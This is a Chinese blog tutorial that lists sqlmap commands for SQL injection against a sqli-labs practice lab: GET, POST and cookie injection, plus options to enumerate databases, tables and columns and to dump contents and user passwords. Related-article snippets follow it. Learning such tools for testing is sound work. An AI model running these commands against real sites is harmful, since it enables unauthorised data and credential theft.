sqlmap命令及参数常规操作

最新推荐文章于 2024-03-15 12:56:57 发布
最新推荐文章于 2024-03-15 12:56:57 发布
阅读量328 收藏
点赞数
分类专栏: 渗透测试 文章标签: get post
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qlqlulu/article/details/111701622
版权

HTTP协议规定post提交的数据必须放在消息主体(entity-body)中,但协议没有规定数据必须使用什么编码方式。HTTP协议是以ASCII码传输,建立再TCP/IP协议之上的应用层规范。HTTP请求分为3个部分:状态行、请求头和消息主体。类似于:

服务端通常是根据请求头(header)中的Content_Type字段来获取请求中的消息主体是用何种方式编码,再对消息主体进行解析。

SQLmap常规操作

GET形式

Python sqlmap.py -u “http://–url地址–/index.php?id=1” //注入判断-u:URL地址参数
在这里插入图片描述在这里插入图片描述python sqlmap.py -u “http://192.168.0.141/sqli-labs/Less-1/index.php?id=1” --banner //查看数据库版本
在这里插入图片描述在这里插入图片描述
Python sqlmap.py -u “http://–url地址–/index.php?id=1” --current-user //当前用户
在这里插入图片描述在这里插入图片描述在这里插入图片描述Python sqlmap.py -u “http://–url地址–/index.php?id=1” --password //查询数据库用户密码
在这里插入图片描述在这里插入图片描述Python sqlmap.py -u “http://–url地址–/index.php?id=1” --dbs //查看所有的数据库
在这里插入图片描述在这里插入图片描述Python sqlmap.py -u “http://–url地址–/index.php?id=1” --current-db //查看当前的数据库
在这里插入图片描述在这里插入图片描述
Python sqlmap.py -u “http://–url地址–/index.php?id=1” --tables //查看所有的表

在这里插入图片描述在这里插入图片描述Python sqlmap.py -u “http://–url地址–/index.php?id=1” --tables -D A //查看A库下的所有表

在这里插入图片描述在这里插入图片描述Python sqlmap.py -u “http://–url地址–/index.php?id=1” --columns -D A -T B //查询A库B表下的所有列

在这里插入图片描述Python sqlmap.py -u “http://–url地址–/index.php?id=1” -C “E,F” -D A -T B //导出字段里的内容

在这里插入图片描述在这里插入图片描述

——POST形式——

Python sqlmap.py -u “http://–url–/” --data “uname=123&passwd=123&submit=Submit” //指定页面的POST注入
在这里插入图片描述
在这里插入图片描述
Python sqlmap.py -r “绝对路径\文件名” --level 3

在这里插入图片描述在这里插入图片描述
python sqlmap.py -u “http://192.168.0.141/sqli-labs/Less-20/index.php” --cookie=“uname=admin” --level 2 //检测指定cookie字段进行注入
Python sqlmap.py -r “绝对路径\文件名.txt”–level 2 //检测文件内cookie字段进行注入
在这里插入图片描述
在这里插入图片描述
python sqlmap.py -u “http://192.168.0.141/sqli-labs/Less-20/index.php” --cookie=“uname=admin” --dbs --level 2
在这里插入图片描述在这里插入图片描述
python sqlmap.py -u “http://192.168.0.141/sqli-labs/Less-1/index.php?id=1” --hostname //查看主机名

在这里插入图片描述在这里插入图片描述

Abc_Kimball
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLmap常用命令
05-08
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,当然对于真实环境中这爆破功能战斗力基本为0....
sqlmap常用指令和参数
weixin_51712979的博客
12-19 329
–threads=10 #并发的HTTP(S)请求的最大数量(默认为1),即线程数,最大为10。 -f, –fingerprint #演示广泛的DBMS版本指纹。 -r #sqlmap可以从一个文本文件中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等)。 –predict-output #该方法可以提升性能,但不与–threads兼容,节省时间! –keep-alive #该方法也可以提升性能 –technique B #sqlmap注入方式的一种 s
Web安全工具—Sqlmap常用命令参数(持续更新)
weixin_44431280的博客
04-07 1万+
Web安全工具—SQLMAP常用命令参数 简介:此篇文章主要记录学习注入神器sqlmap的过程,文章会对常见参数进行详解(附图),适合入门学习。 一:SQLMAP介绍: 简介:sqlmap是一个由python语言编写的开源自动化渗透测试工具,主要被用来检测sql注入漏洞,是一款功能强大的sql漏洞检测利用工具。 支持检测的数据库:access,mysql,oracle,postgresql,sqlserver(mssql),db2等 支持的注入类型:布尔盲注,时间盲注,显错注入,堆叠注入,联合查询注入等,
sqlmap 常用参数
idooooo的博客
07-18 1006
2.sqlmap 常用参数 -p 指定参数 例如 -p id -dbs 输出所有库 无参数 --current 当前 例如 --current-db -D 指定库 --tables 列出所有表 例如 -D phplyb --tables -T 指定表 例如 -D phplyb
SQLmap常用命令/使用教程
wangyuxiang946的博客
08-08 1万+
SQLmap是一款自动化SQL注入神器,用于SQL注入漏洞的检测和利用,支持多种数据库 检测位置 -u -- 指定url(GET请求) -p -- 指定参数(url包含多个参数时,指定参数) --data= -- 指定POST请求参数 --cookie -- 指定cookie参数 -r -- 从文件中加载HTTP请求(在需要检测的Header后面加上*) 获取数据 --dbs -- 获取数据库名 --tables -- 获取表名 --columns -- 获取字段名 --du
sqlmap命令大全
02-22
什么是SQLmapSQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令
sqlmap安装包及教程.zip
12-23
在这个"sqlmap安装包及教程.zip"压缩文件中,包含了SQLMap的安装程序和后续配置的教程,这将有助于用户快速上手和熟练使用这款工具。 首先,让我们深入了解SQLMap的基本概念。SQL注入是一种常见的网络安全威胁,...
Web应用安全:Sqlmap操作参数介绍.pptx
06-19
在实际使用中,Sqlmap有多种操作参数,例如: - `-u "URL"` 用于自动探测指定URL的SQL注入漏洞。 - `--batch` 参数可让扫描过程使用默认配置,简化操作。 - `--dbs` 获取目标数据库的信息。 - `-D 数据库名字 --...
Sqlmap常用命令总结
jemus17的博客
02-26 3693
sql注入,sqlmap的常用命令总结
SQLmap使用指令详解
06-12
SQLmap是一款网络安全检测工具 支持现在几乎所有的数据库,比国内的任何工具都强。 支持get,post ,cookie注入。可以添加cookie和user-agent 支持盲注,错误回显注入,还有其他多种注入方法。 支持代理, 优化算法,更高效。 指纹识别技术判断数据库
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
Sqlmap命令大全
热门推荐
学习、分享、交流
05-26 2万+
Sqlmap:开源的SQL注入漏洞检测的工具,能够检测动态页面中的get/post参数,cookie,http头,还能 够查看数据,文件系统访问,甚至能够操作系统命令执行。
SQLmap命令大全
mmxhappy的专栏
01-25 1939
-delay=DELAY 在每个HTTP请求之间的延迟时间,单位为秒 --delay 0.5。--dbms=DBMS 强制后端的DBMS为此值 如:--dbms "Mysql"--proxy=PROXY 使用HTTP代理连接到目标URL --proxy。--random-agent 使用随机选定的HTTP User - Agent头。此外,您还可以运行您自己。--user-agent=AGENT 指定 HTTP User - Agent头。
SQLMAP教程,零基础入门到精通,一篇就够了!
资深程序员,曾自学JAVA,C#,如今从业于网安行业
02-18 1485
这些选项可以用来创建用户自定义函数`--udf-inject 注入用户自定义函数`` ` `--shared-lib=SHLIB 共享库的本地路径`
【SQL注入】Sqlmap使用指南(手把手保姆版)持续更新
最新发布
开水的博客
03-15 2万+
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。python sqlmap.py -参数sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
00-Sqlmap认识
南淮北安的博客
01-01 434
sqlmap支持五种不同的注入模式: a.基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 b.基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 c.基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 d.联合查询注入,可以使用union的情况下的注入。 e.堆查询注入,可以同时执行...
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4733
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
SQLMAP详细介绍之参数详解
yuchen的博客
01-16 1775
SQLMAP参数详解option 选项target 目标Request 请求Optimization 优化Injection 注入Detection 侦察Techniques 技巧Fingerprint 指纹Enumeration 枚举Brute force 暴力User-defined function injection 用户自定义注入函数File system access 访问文件系统Operating system access 操作系统连接windows 注册表连接通用参数和混杂选项 optio
sqlmap命令详解与功能介绍
使用SQLMap命令行界面非常直观,命令格式为 `sqlmap.py [options]`。选项包括: - `-h` 或 `--help`:显示基础帮助信息后退出。 - `-hh`:显示更详细的高级帮助信息后退出。 - `-v` 或 `--verbose`:设置日志的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值